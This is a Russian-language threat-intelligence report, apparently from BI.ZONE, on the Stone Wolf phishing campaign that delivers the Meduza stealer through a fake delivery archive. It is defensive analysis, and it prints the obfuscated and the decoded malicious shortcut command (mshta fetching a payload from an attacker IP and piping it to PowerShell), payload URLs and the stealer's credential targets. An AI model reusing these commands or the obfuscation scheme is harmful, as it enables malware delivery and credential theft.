Stone Wolf атакует российские компании стилером Meduza
Специалисты BI.ZONE Threat Intelligence отмечают, что группировки все чаще используют вредоносное ПО, которое можно приобрести на теневых ресурсах. Некоторое время назад мы зафиксировали кампанию кластера, который получил название Stone Wolf. Эти злоумышленники рассылают фишинговые письма от лица организации, занимающейся промышленной автоматизацией. Цель атак — доставить в корпоративные инфраструктуры стилер Meduza.
Киберпреступники часто проводят фишинговые рассылки от имени крупных и известных организаций. Чем сильнее бренд компании, тем охотнее злоумышленники используют ее айдентику. Узнаваемые логотипы и прочие элементы фирменного стиля повышают доверие со стороны пользователей, подталкивая их открыть письмо. Важно помнить, что обладатель торговой марки не несет ответственности за действия преступников и причиненный в результате ущерб.
- Злоумышленники продолжают использовать архивы, содержащие, кроме вредоносных файлов, легитимные документы, которые позволяют отвлечь жертву. Данный факт указывает на критичность получения знаний о современных методах, используемых атакующими.
- Использование названий и данных реальных организаций значительно увеличивает шансы загрузки и открытия вредоносных вложений и подчеркивает важность регулярного обучения персонала.
- Атакующие продолжают расширять арсенал используемого коммерческого ВПО, что в очередной раз подчеркивает важность получения информации с теневых ресурсов.
В рамках исследуемой кампании злоумышленники распространяли архив с именем Dostavka_Promautomatic.zip. В архиве находились:
- файл с расширением
.p7s— файл цифровой подписи; - файл с расширением
.docx— легитимный документ, используемый для отвлечения пользователя; - файл
Scan_127-05_24_dostavka_13.05.2024.pdf.url— вредоносная ссылка для загрузки Meduza Stealer.
Содержимое легитимного документа
При запуске вредоносной ссылки произойдет обращение к находящемуся на удаленном SMB‑сервере файлу для его загрузки и запуска.
Сам файл является ярлыком Windows, выполняющим следующую команду:
SyncAppvPublishingServer.vbs
;520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,462,457,459,464,457,461,459,461,463,457,512,531,512|%{$p+=[char]($_-411)};$p | powershell –
Если провести операцию вычитания, то команда приобретет следующий вид:
SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -
Команда осуществляет загрузку HTA‑файла с удаленного сетевого ресурса с именем Scan_127-05_24_dostavka_13.05.2024.exe, его запуск с помощью MSHTA, а затем выполнение вывода команды с помощью интерпретатора PowerShell. Команда выполняется с помощью WScript.Shell.Run([команда]) и содержит в себе зашифрованную посредством алгоритма AES полезную нагрузку для интерпретатора PowerShell, которая расшифровывается во время выполнения и запускается.
Расшифрованный скрипт реализует следующие действия:
- Загружает документ с удаленного сетевого ресурса
http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdfи запускает. - Загружает In2al5d P3in4er с сетевого ресурса
http://193.124.33[.]71:3217/scp231.exeи запускает.
При этом файлы сохраняются в папку C:\Users\[user]\Appdata\Roaming. Далее осуществляется поиск файла Scan_127-05_24_dostavka_13.05.2024.pdf.url и его замена загруженным PDF‑файлом.
In2al5d P3in4er используется для загрузки и запуска Meduza Stealer. Этот стилер появился на теневых ресурсах в июне 2023 года. ВПО можно приобрести по цене 199 долларов за месяц использования, 399 долларов за три месяца или 1199 долларов за бессрочную лицензию. В марте 2024 года появились дополнительные возможности, например приобретение загрузчика (вероятно, In2al5d P3in4er), а также выделенного сервера с выбором параметров количества ядер, оперативной памяти и места на диске.
Объявление о продаже в телеграм‑канале
При покупке предоставляется билдер, а также веб‑панель, в которой можно отслеживать собранные данные с устройств жертв. В исполняемый файл, по заверениям разработчиков, встроен модуль, ограничивающий возможность реализации атак на территории СНГ. В исследуемом образце такая проверка отсутствует.
Если ВПО не может подключиться к управляющему серверу, работа программы завершается.
Стилер собирает информацию о скомпрометированной системе, а именно версию операционной системы, имя устройства, время, информацию о процессоре, оперативной памяти и графическом адаптере, разрешение экрана (и его снимок), а также внешний IP‑адрес устройства с помощью обращения к сетевому ресурсу https://api.ipify[.]org.
Также стилер собирает следующие данные:
- учетные данные, сохраненные в Outlook;
- учетные данные из браузеров, например Chrome, Edge, Comodo, Atom, Yandex;
- учетные данные из кошельков, например Coinomi, Exodus, Ethereum;
- список установленных приложений с помощью обращения к ветке реестра
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall; - сессии приложений Telegram и Steam, а также токен Discord;
- учетные данные из менеджеров паролей, например 1Password, GAuth, NordPass;
- данные из Windows Credential Manager и Windows Vault c помощью функций WinAPI (
VaultEnumerateVaults,VaultOpenVault); - список активных процессов с помощью функций WinAPI (
CreateToolhelp32Snapshot,Process32FirstW,Process32NextW). - Собранные данные отправляются на управляющий сервер по протоколу TCP.
cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bbaf2386431856e1b8e41a0f94210c42919498250506fffde57886b1e3e6b1f0f4dd38bf69a941ef4637f874016eccab7907499e7afddf06ed0bd7f6a942931d9f095b37644804d322ca470d91345ba784dad15c8f1f5a6df20ee7630abcf013f751d01bc7e689dd5aa78c622b0e53d979a6c1cab7b74d61b61c6d014680ade46946a83fa47ebb0a533223ebd988c8a5408e7f9a861d4d9fd1addbe1bad6c41ea08e99941fc79650581787813b87334cfcd17ac30839483a42b553cdbae49bc76f0414447d166298fd10bbe5d1ea60462fb24cb0a4256df988d50246f5b0b4d284c2e0e3b7bfd21f5c6b32b21a3137004f3ddb43cc5613fe1a7245473c45ce529aed2a5e3ce5bb91db9641975229318e5901a62b9e1b73a6f0ba15c15acb2049c535171edb79c9beda0462e6541d5a4da3b8ee7d8c06fca20e7cd4621e60de50b8989638e5c290c38eecf8849607d9107f3d69a38d3babb67c77382e2f3376d70030f822cbc92ec6f492c5b76291a921214ac65e5b81c3bc2f545d576e1dd15635ac836822fc7f214d6e090a2bc5d1a4839903438d036bd4da5c1729dca2d882f1d05158ad6e03aeaf6a677d049d0f11c2a86eb8768748fc37ee6844009dec5c01de50fa9a097b0422fe22031f46402cf045efff32daf384fa89b6aca6061551e53b4810fb9a74764797c66226478ca54af5b7f14c0fb78fa711cb87eb11c8ed7f32c4baf3c05a9d48a328de6d78f4e8d62caa453045ac99aaf35cbb2273e461bc9a951be6b17f713c9866e17aa71d9e1c4615540b9851a956a23b8fe9dee7c2ddbb4a085012ecc82932da446a9a30f398fcba1ba7df7d9d6f7076294301ea1b691e15ea86c8ea6c0d6db8241423b7d731cf2dd398c69ef16e9bfe29e32d7fd8acbe599e8e9605e02e0f6c284ece747fa393acb3b2e952f12b3ca738026483111605f55da61ab7a5e71b45b6884882024ea8135921dca7ae9017ba5e14b647a4f99afbfde2dd0137e872ef20a6454776f5f896d03053327070fadf25c7831cddb001ec9c59da49bbf4bed1308e20775bab4c7558857677a678c4210d0cd4be6663ac97c5cbb2f0044d61a793d2cebe33411ecf59e2613b615663e680b28c92ddd7e657014bb108f4779325b34a02a06bbc7d3cbbdb324747afec51d0a2441925be486a970731749d2839cb8757e8e6136d80747c59c6145e8197aba1a0fb305386ca84635d1fc251238a9379c08f3384f43274a653d01bf4bad4c810a71a679de54927db80c34f1e8c9b2bd5efa6f0f4c3c8fb5cfda31535841b6bd539360e19c71ba9d880e4b532ea375242878c2a18b99875d8922657caa813e5bfaf4094f252362c1b9e5d46a866a52f03dca80aa812d5637a8d2304527603445f78e79b855c26a234763f42527860fc45c04b377b78fa21a9803709e248f6c0d56ba42dd15cc392f55e79e3ca4b88a3a15dcff255edb80ca44e82a758f9ea53a2cc12525d47cee2442ce10695e29830a77d38d4af1e24d6881203743664abc4ad9a8c97c0f2193.124.33[.]71109.120.177[.]48
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Использует вложения в фишинговые письма для получения первоначального доступа |
| Execution |
User Execution: Malicious File |
Жертве необходимо запустить вредоносный файл, чтобы инициировать процесс компрометации |
|
Command and Scripting Interpreter: PowerShell |
Использует PowerShell для выполнения команд и сценариев |
|
|
Command and Scripting Interpreter: Visual Basic |
Использует VBScript для выполнения команд и сценариев |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Деобфусцирует запускаемые команды и сценарии |
|
Impersonation |
Осуществляет фишинговые рассылки, представляясь реальной организацией |
|
|
Masquerading: Double File Extension |
Использует двойное расширение для маскировки вредоносного файла |
|
|
System Binary Proxy Execution: Mshta |
Использует MSHTA для запуска вредоносных файлов |
|
| Credential Access |
Credentials from Password Stores: Credentials from Web Browsers |
Извлекает аутентификационный материал из браузеров |
|
Credentials from Password Stores: Windows Credential Manager |
Извлекает аутентификационный материал из диспетчера учетных данных Windows |
|
|
Credentials from Password Stores: Password Managers |
Извлекает аутентификационный материал из менеджеров паролей |
|
|
Unsecured Credentials: Credentials In Files |
Извлекает аутентификационный материал из файлов |
|
|
Unsecured Credentials: Credentials in Registry |
Извлекает аутентификационный материал из реестра |
|
| Discovery |
Process Discovery |
Собирает информацию о запущенных процессах |
|
System Information Discovery |
Собирает информацию о скомпрометированной системе |
|
| Command and Control |
Non-Application Layer Protocol |
Использует протокол TCP для коммуникации с командным сервером |
|
Ingress Tool Transfer |
Загружает ВПО в скомпрометированную систему |
|
| Exfiltration |
Automated Exfiltration |
Автоматически выгружает собранные данные |
|
Exfiltration Over C2 Channel |
Выгружает собранные данные на командный сервер |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE EDR:
win_execution_or_open_file_with_double_extensionwin_use_mshta_to_run_hta_from_urlwin_access_to_ip_detection_servicewin_possible_browser_stealer_activitywin_suspicious_access_to_password_manager_files
Злоумышленники могут обходить превентивные средства защиты и проникать в инфраструктуру незамеченными. Важно нейтрализовать угрозу до того, как бизнес понесет значительный ущерб. Поэтому мы советуем внедрять решения для защиты конечных точек от сложных угроз, например BI.ZONE EDR. Этот продукт поможет отследить атаку на ранних стадиях, оперативно отреагировать на нее в автоматическом режиме либо с помощью команды кибербезопасности.
Чтобы быть на шаг впереди злоумышленников, нужно понимать, как меняются их методы и инструменты, и учитывать эту информацию при оценке ландшафта киберугроз. Для этого мы рекомендуем использовать данные портала BI.ZONE Threat Intelligence. Он предоставляет подробную информацию об актуальных атаках, злоумышленниках, тактиках, техниках и инструментах. Эти данные помогают обеспечить эффективную работу СЗИ, ускорить реагирование на инциденты и защититься от наиболее серьезных для компании угроз.